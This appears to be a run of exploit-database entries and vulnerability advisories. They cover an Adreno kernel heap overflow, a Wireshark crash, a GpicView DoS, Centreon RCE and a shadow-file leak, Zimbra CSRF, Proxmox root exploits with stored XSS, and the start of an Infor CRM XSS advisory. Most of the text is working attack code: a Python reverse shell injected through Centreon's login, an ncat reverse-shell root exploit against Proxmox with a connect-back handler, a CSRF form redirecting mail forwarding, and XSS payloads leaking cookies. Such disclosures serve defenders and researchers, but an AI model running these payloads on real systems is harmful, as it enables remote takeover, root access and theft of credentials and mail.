data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (data == MAP_FAILED) {
perror("mmap");
return -1;
}
memset(data, 0x41, 0x100001000);
ret = syscall(__NR_io_setup, 2, &ctx_id);
if (ret == -1) {
perror("io_setup");
return -1;
}
memset(&iocb, 0, sizeof(struct iocb));
iocb.aio_fildes = s;
iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
iocb.aio_nbytes = 0xfffffe60;
iocb.aio_buf = (unsigned long) &data;
iocbp = &iocb;
syscall(__NR_io_submit, ctx_id, 1, &iocbp);
return 0;
}
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=734
The Adreno GPU driver for the MSM Linux kernel contains a heap
overflow in the IOCTL_KGSL_PERFCOUNTER_QUERY ioctl command. The bug
results from an incorrect conversion to a signed type when calculating
the minimum count value for the query option. This results in a
negative integer being used to calculate the size of a buffer, which
can result in an integer overflow and a small sized allocation on
32-bit systems:
int adreno_perfcounter_query_group(struct adreno_device *adreno_dev,
unsigned int groupid, unsigned int __user *countables,
unsigned int count, unsigned int *max_counters)
{
...
if (countables == NULL || count == 0) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return 0;
}
t = min_t(int, group->reg_count, count);
buf = kmalloc(t * sizeof(unsigned int), GFP_KERNEL);
if (buf == NULL) {
kgsl_mutex_unlock(&device->mutex, &device->mutex_owner);
return -ENOMEM;
}
for (i = 0; i < t; i++)
buf[i] = group->regs[i].countable;
Note that the "count" parameter is fully controlled. Setting count =
0x80000001 will result in min_t returning 0x80000001 for "t", and
kmalloc allocating a buffer of size 0x4. The loop will then overflow
"buf" because "t" is unsigned, i.e. a large positive value.
The bug was added in the following commit:
https://www.codeaurora.org/cgit/quic/la/kernel/msm/commit/drivers/gpu/msm/adreno.c?h=aosp-new/android-msm-angler-3.10-marshmallow-mr1&id=b3b5629aebe98d3eb5ec22e8321c3cd3fc70f59c
A proof-of-concept that triggers this issue (adreno_perfcnt_query.c)
is attached. On Android devices /dev/kgsl-3d0 is typically accessible
in an untrusted app domain, so if exploited this issue could be used
for local privilege escalation.
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/ioctl.h>
struct kgsl_perfcounter_query {
unsigned int groupid;
unsigned int *countables;
unsigned int count;
unsigned int max_counters;
unsigned int __pad[2];
};
#define KGSL_IOC_TYPE 0x09
#define IOCTL_KGSL_PERFCOUNTER_QUERY _IOWR(KGSL_IOC_TYPE, 0x3A, struct kgsl_perfcounter_query)
int main(void) {
int fd;
struct kgsl_perfcounter_query data;
unsigned int countables[16];
fd = open("/dev/kgsl-3d0", O_RDWR);
if (fd == -1) {
perror("open");
return -1;
}
memset(&data, 0, sizeof(struct kgsl_perfcounter_query));
data.groupid = 1;
data.countables = (unsigned int *) &countables;
data.count = 0x80000001;
ioctl(fd, IOCTL_KGSL_PERFCOUNTER_QUERY, &data);
close(fd);
return 0;
}
Source: https://code.google.com/p/google-security-research/issues/detail?id=651
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==14146==ERROR: AddressSanitizer: heap-use-after-free on address 0x6070000003a0 at pc 0x000000b2c8eb bp 0x7ffdfc45fa70 sp 0x7ffdfc45fa68
READ of size 1 at 0x6070000003a0 thread T0
#0 0xb2c8ea in print_hex_data_buffer wireshark/epan/print.c:987:13
#1 0xb2bf43 in print_hex_data wireshark/epan/print.c:904:14
#2 0x5422e2 in print_packet wireshark/tshark.c:4155:10
#3 0x53cb2e in process_packet wireshark/tshark.c:3742:7
#4 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#5 0x52c1df in main wireshark/tshark.c:2197:13
0x6070000003a0 is located 0 bytes inside of 65-byte region [0x6070000003a0,0x6070000003e1)
freed by thread T0 here:
#0 0x4d6ce0 in free llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:30
#1 0xc1fd8e in real_free wireshark/epan/tvbuff_real.c:47:3
#2 0xc2229c in tvb_free_internal wireshark/epan/tvbuff.c:110:3
#3 0xc22049 in tvb_free_chain wireshark/epan/tvbuff.c:135:3
#4 0xc21ed1 in tvb_free wireshark/epan/tvbuff.c:125:2
#5 0xbc972e in free_all_fragments wireshark/epan/reassemble.c:351:4
#6 0xbd40e5 in fragment_add_seq_common wireshark/epan/reassemble.c:1919:5
#7 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#8 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#9 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#10 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#12 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#14 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#16 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#17 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#18 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#19 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#20 0x53c91b in process_packet wireshark/tshark.c:3728:5
#21 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#22 0x52c1df in main wireshark/tshark.c:2197:13
previously allocated by thread T0 here:
#0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x7ff6062f0610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
#2 0xbe1202 in fragment_add_seq_work wireshark/epan/reassemble.c:1793:2
#3 0xbd4181 in fragment_add_seq_common wireshark/epan/reassemble.c:1925:6
#4 0xbd4895 in fragment_add_seq_check_work wireshark/epan/reassemble.c:2006:12
#5 0xbd43a7 in fragment_add_seq_check wireshark/epan/reassemble.c:2050:9
#6 0x2fb8256 in dissect_mux27010 wireshark/epan/dissectors/packet-mux27010.c:949:28
#7 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#9 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#13 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#16 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x53c91b in process_packet wireshark/tshark.c:3728:5
#18 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#19 0x52c1df in main wireshark/tshark.c:2197:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/epan/print.c:987:13 in print_hex_data_buffer
Shadow bytes around the buggy address:
0x0c0e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0e7fff8040: fa fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
0x0c0e7fff8050: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0e7fff8060: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fd
=>0x0c0e7fff8070: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fa fa fa
0x0c0e7fff8080: fa fa fd fd fd fd fd fd fd fd fd fa fa fa fa fa
0x0c0e7fff8090: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa fd fd
0x0c0e7fff80a0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
0x0c0e7fff80b0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00
0x0c0e7fff80c0: 00 00 06 fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==14146==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11799. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39503.zip
#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day
#Example: python POC.py [image-file]
from sys import argv
from subprocess import Popen
from shlex import split
from time import sleep
import shutil
def DOS(arg):
#"""------------------------------------"""#
command = 'gpicview ' + arg[1] #''' Recieve file & construct Popen '''#
command_2 = split(command) #"""------------------------------------"""#
#"|" "|"#
Popen(command_2) #""" Open file with Gpicview """#
#"""------------------------------------"""#
print("Required: You have 15 seconds")
print("to click on preferences, and ")
print("check 'Auto Save Images' ")
sleep(15)
#"""------------------------------------"""#
buffer = 'A' * 70 + '.png' #"|" Rename image with Buffer "|"#
shutil.move(arg[1], buffer) #"""------------------------------------"""#
def main():
print("Author: David Silveiro ")
print("Company: Xino.co.uk ")
print(" POC Gpicview DOS ")
DOS(argv)
print("File ready for overflow ")
print("Now simply rotate the image")
if __name__ == "__main__":
main()
Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================
Description
===========
Centreon is a popular monitoring solution.
A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.
SQL injection leading to RCE
============================
Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
----------------
Proof of Concept
----------------
TCP Reverse Shell using python.
#!/usr/bin/env python
import requests
import argparse
def shell(target, reverseip, reverseport):
payload = 'import socket as a,subprocess as b,os as
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
% (reverseip,reverseport)
print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
reverseport)
req = requests.post(target, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
print "[+] DEAD !"
if __name__ == "__main__":
print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True)
parser.add_argument("--reverseip", required=True)
parser.add_argument("--reverseport", required=True, type=int)
args = parser.parse_args()
shell(args.target, args.reverseip, args.reverseport)
Shell :
nightlydev@nworkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@sysdream.com>
[~] Starting reverseshell : 172.16.138.1 - port : 8888
# Other term
nightlydev@nworkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios
---------------
Vulnerable code
---------------
The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:
/*
* print Error in log file.
*/
exec("echo \"".$string."\" >> ".$this->errorType[$id]);
In class/centreonAuth.class.php, line 227:
$DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND `contact_register` = '1' LIMIT 1");
--------
Solution
--------
Update to the Centreon 2.5.4
Possible root password disclosure in centengine (Centreon Entreprise Server)
============================================================================
In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.
**Access Vector**: local
**Security Risk**: high
**Vulnerability**: CWE-209
----------------
Proof of Concept
----------------
$ sudo /usr/sbin/centengine -v /etc/shadow
[1416391088] reading main config file
[1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
[1416391088]
---------------
Vulnerable code
---------------
In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon
CENTREON ALL = NOPASSWD: /usr/sbin/centengine -v *
--------
Solution
--------
Do not allow centengine to be run as root or do not disclose the line
that caused the error.
Timeline (dd/mm/yyyy)
=====================
* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities
Fixes
=====
*
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
*
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
*
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1
Affected versions
=================
* Centreon <= 2.5.3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
======================================
Multiple CSRF in Zimbra Mail interface
======================================
CVE-2015-6541
Description
===========
Multiple CSRF vulnerabilities have been found in the Mail interface of
Zimbra 8.0.9 GA Release, enabling to change account
preferences like e-mail forwarding.
CSRF
====
Forms in the preferences part of old releases of Zimbra are vulnerable
to CSRF because of the lack of a CSRF token identifying a valid session.
As a consequence, requests can be forged and played arbitrarily.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-352
**CVSS Base score**: 5.8
----------------
Proof of Concept
----------------
<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171/service/soap/BatchRequest" method="POST">
<input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="ZimbraWebClient - FF38
(Win)" version="8.0.9_GA_6191"/><session xmlns="" id="19"/><account
xmlns="" by="name">anto@mail.ubuntu.fr</account><format xmlns=""
type="js"/></context></soap:Header><soap:Body><BatchRequest
xmlns="urn:zimbra" onerror="stop"><ModifyPrefsRequest
xmlns="urn:zimbraAccount" requestId="0"><pref xmlns=""
name="zimbraPrefMailForwardingAddress">itworks@ubuntu.fr</pref></ModifyPrefsRequest><a
xmlns="" n'
value='"sn">itworks</a></BatchRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Solution
========
Sensitive forms should be protected by a CSRF token.
Fixes
=====
Fixed with 8.5 release : bug 83547
(https://wiki.zimbra.com/wiki/Security/Collab/86#Notes_from_8.5)
Affected versions
=================
* Zimbra <= 8.0.9 GA Release
Credits
=======
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
-dot- fr)
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)
=====================================================================
Proxmox VE 3/4 Insecure Hostname Checking (Remote Root Exploit, XSS,
Privileges escalation)
=====================================================================
Description
===========
Proxmox is a popular virtualization solution based on KVM and Linux
containers.
A critical vulnerability has been found in Proxmox VE 3 (OpenVZ) and
Proxmox VE 4 beta 1 (LXC) in the
virtual machine creating form allowing authenticated remote users to
overwrite configuration files settings.
Configuration file overwriting
==============================
Because the Proxmox VE application doesn't check the
user-provided "hostname" POST parameter, it's
possible to overwrite configuration files using a CRLF injection.
In Proxmox VE 3, we successfully gained access to the host filesystem
from a container and elevated our container capabilities, allowing us to
obtain user credentials and sniff the network.
In Proxmox VE 4b1, because LXC allows "hooks" to execute commands, we
successfully gained root privileges on the host.
It's also possible to exploit Proxmox clusters.
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-915
Proof of Concept
----------------
The following exploit works for Proxmox VE 4 beta 1. The
lxc.hook.pre-start configuration variable is used to trigger the ncat
reverse-shell payload when the container is started.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
from time import sleep
def exploit(target, username, password, vmid, template, realm,
reverse, hostname):
payload = "ncat %s %s -e /bin/sh" % reverse
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"sysdream\nlxc.hook.pre-start=%s &&" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpulimit": 1,
"cpuunits": 1024,
"net0":"name=eth0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Container Created... (Sleeping 20 seconds)"
sleep(20)
print "[+] Starting container..."
startcontainer =
requests.post("https://%s/api2/extjs/nodes/%s/lxc/%s/status/start" %
(target, hostname, vmid), verify=False, headers={"CSRFPreventionToken":
csrfticket}, cookies={"PVEAuthCookie": ticket})
if startcontainer.status_code == 200:
response = startcontainer.json()
if "success" in response and response["success"]:
print "[+] Exploit should be working..."
else:
print "[!] Can't start container ! Try to
start it manually."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
def handler(lport):
print "[~] Starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "[+] Connection from %s" % addr[0]
t.sock = conn
print "[+] Pop the shell ! :)"
t.interact()
if __name__ == "__main__":
print "[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas
Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--localhost", required=True, help="Local
host IP for the connect-back shell.")
parser.add_argument("--localport", required=True, type=int,
help="Local port for local bind handler")
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor "
"(default :
local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
parser.add_argument("--hostname", required=True, help="The
target hostname")
args = parser.parse_args()
handlerthr = Thread(target=handler, args=(args.localport,))
handlerthr.start()
exploitthr = Thread(target=exploit, args=(args.target,
args.username, args.password, args.vmid, args.template, args.realm,
(args.localhost, args.localport), args.hostname))
exploitthr.start()
handlerthr.join()
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
remoteroot.py --target 10.25.0.101:8006 --username nicolas --password
pveuser --localhost 10.25.0.10 --localport 9999 --vmid 456 --realm pve
--hostname pve4
[~] Proxmox VE 4.0b1 Authenticated Root Exploit - Nicolas Chatelain
<n.chatelain[at]sysdream.com>
[~] Starting handler on port 9999
[~] Obtaining authorization key...
[+] Authentication success.
[+] Container Created... (Sleeping 20 seconds)
[+] Exploit should be working...
[+] Connection from 10.25.0.101
[+] Pop the shell !
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
The following exploit works for Proxmox VE 3. This proof of concept
mount the host /dev/dm-0 on the container and add multiples capabilities
on the container.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
def exploit(target, username, password, vmid, template, realm,
hostname):
payload = "sysdream\"\nDEVNODES=\"dm-0:r
\"\nCAPABILITIES=\"mknod:on, sys_chroot:on, sys_rawio: on, net_admin:on,
dac_override:on\"\n#"
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname": payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpus": 1,
"netif":"ifname=eth0,bridge=vmbr0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Countainer (Capabilities + DM-0 Mount)
Created."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
if __name__ == "__main__":
print "[~] Proxmox VE 3 Authenticated Privileges Escalation
Exploit - Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--hostname", required=True, help="The
target hostname")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
args = parser.parse_args()
exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.hostname)
Shell output :
nightlydev@nworkstation ~/Lab/Proxmox_Exploits $ python
privescalation.py --username root --password sysofdream --vmid 123
--realm pam --target 10.25.0.110:8006 --hostname pve3
[~] Proxmox VE 3 Authenticated Privileges Escalation Exploit -
Nicolas Chatelain <n.chatelain[at]sysdream.com>
[~] Obtaining authorization key...
[+] Authentication success.
[+] Countainer (Capabilities + DM-0 Mount) Created.
-- On container :
root@sysdream:/# ls -lah /dev/dm-0
brw-r----T 1 root root 253, 0 Aug 23 00:33 /dev/dm-0
---
Stored Cross-Site Scripting
===========================
Same vulnerability, different usage. Works on Proxmox 3 and Proxmox 4b1.
**Access Vector**: remote
**Security Risk**: high
Proof of Concept
----------------
The following exploit will create a stored XSS displaying the user
cookies and the PVE CSRFPreventionToken.
#!/usr/bin/env python
import requests
import socket
import telnetlib
from threading import Thread
import argparse
def exploit(target, username, password, vmid, template, realm,
version, hostname):
payload =
"eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,34,45,34,32,43,32,80,86,69,46,67,83,82,70,80,114,101,118,101,110,116,105,111,110,84,111,107,101,110,41,59))"
print "[~] Obtaining authorization key..."
apireq = requests.post("https://%s/api2/extjs/access/ticket" %
target,
verify=False,
data={"username": username,
"password": password,
"realm": realm})
response = apireq.json()
if "success" in response and response["success"]:
print "[+] Authentication success."
ticket = response["data"]["ticket"]
csrfticket = response["data"]["CSRFPreventionToken"]
if version == "4":
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/lxc" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken":
csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"<img/src='x'/onerror=%s>" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpulimit": 1,
"cpuunits": 1024,
"net0":"name=eth0"})
elif version == "3":
createvm =
requests.post("https://%s/api2/extjs/nodes/%s/openvz" % (target, hostname),
verify=False,
headers={"CSRFPreventionToken": csrfticket},
cookies={"PVEAuthCookie": ticket},
data={"vmid": vmid,
"hostname":"<img/src='x'/onerror=%s>" % payload,
"storage": "local",
"password": "sysdream",
"ostemplate": template,
"memory": 512,
"swap": 512,
"disk": 2,
"cpus": 1,
"netif":"ifname=eth0,bridge=vmbr0"})
if createvm.status_code == 200:
response = createvm.json()
if "success" in response and response["success"]:
print "[+] Stored XSS Created."
else:
print "[!] Error creating container..."
print response
else:
print "[!] Error creating Container. Bad HTTP Status
code : %d" % createvm.status_code
else:
print "[!] Authentication failed - Check the credentials..."
if __name__ == "__main__":
print "[~] Proxmox VE 3/4b1 Stored Cross Site Scripting -
Nicolas Chatelain <n.chatelain[at]sysdream.com>\n"
parser = argparse.ArgumentParser()
parser.add_argument("--target", required=True, help="The target
host (eg : 10.0.0.1:8006)")
parser.add_argument("--username", required=True)
parser.add_argument("--password", required=True)
parser.add_argument("--vmid", required=False, default="999",
type=int, help="A unique ID for the container, exploit will fail if the
ID already exists.")
parser.add_argument("--template", required=False,
default="local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz",
help="An existing template in the hypervisor
(default : local:vztmpl/debian-7.0-standard_7.0-2_i386.tar.gz)")
parser.add_argument("--realm", required=False, default="pam",
choices=["pve", "pam"])
parser.add_argument("--version", default="3", choices=["3",
"4"], help="The Proxmox version to exploit")
parser.add_argument("--hostname", required=True, help="The
target hostname")
args = parser.parse_args()
exploit(args.target, args.username, args.password, args.vmid,
args.template, args.realm, args.version, args.hostname)
---------------
Vulnerable code
---------------
The vulnerable code is located in the /usr/share/perl5/PVE/LXC.pm for
Proxmox 4.
For Proxmox 3, the vulnerable code is located in
/usr/share/perl5/PVE/OpenVZ.pm.
--------
Solution
--------
Proxmox 4 : Update to pve-container 0.9-22
Proxmox 3 : Update to pve-manager 3.4-10
Timeline (dd/mm/yyyy)
=====================
04/09/2015 : Initial discovery.
17/09/2015 : Contact with proxmox team.
18/09/2015 : Proxmox fixes the vulnerabilities.
18/09/2015 : Proxmox releases a new pve-container version (0.9-22)
18/09/2015 : Proxmox releases a new pve-manager version (3.4-10)
Affected versions
=================
* Proxmox VE 4
* Proxmox VE 3
Credits
=======
* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
Infor CRM 8.2.0.1136 Multiple HTML Script Injection Vulnerabilities
Vendor: Infor
Product web page: http://www.infor.com
Affected version: 8.2.0.1136
Summary: Infor® CRM, formerly Saleslogix, is an award-winning
customer relationship management (CRM) solution that provides
a complete view of customer interactions, so your business can
collaborate and respond promptly and knowledgably to customer
inquiries, sales opportunities, and service requests. Infor CRM
includes a robust suite of sales, marketing, and service capabilities,
to offer businesses of all sizes a fast, flexible, and affordable
solution for finding, winning, and growing profitable customer
relationships.
Desc: Infor CRM suffers from multiple stored cross-site scripting
vulnerabilities. Input passed to several POST/PUT parameters in
JSON format is not properly sanitised before being returned to the
user. This can be exploited to execute arbitrary HTML and script
code in a user's browser session in context of an affected site.
Tested on: Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5308
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5308.php
21.01.2016
---
----------------------------------
Affected parameter(s): description
----------------------------------
PUT /SLXClient/slxdata.ashx/slx/system/-/attachments(%22eUSERA0004IX%22)?_includeFile=false&format=json&_t=1456358980947 HTTP/1.1
Host: intranet.zeroscience.mk
{$updated: "/Date(1456359095000)/", $key: "eUSERA0004IX",…}
"": ""
$descriptor: ""
$etag: "+CgjMLB+0nA="
$httpStatus: 200
$key: "eUSERA0004IX"
$lookup: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$post: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments?format=json"
$schema: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$schema?format=json"
$service: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$service?format=json"
$template: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments/$template?format=json"
$updated: "/Date(1456359095000)/"
$url: "https://intranet.zeroscience.mk/SLXClient/slxdata.ashx/slx/system/-/attachments('eUSERA0004IX')"
accountId: null
activityId: null
attachDate: "2016-01-25T00:09:39Z"
contactId: null
contractId: null
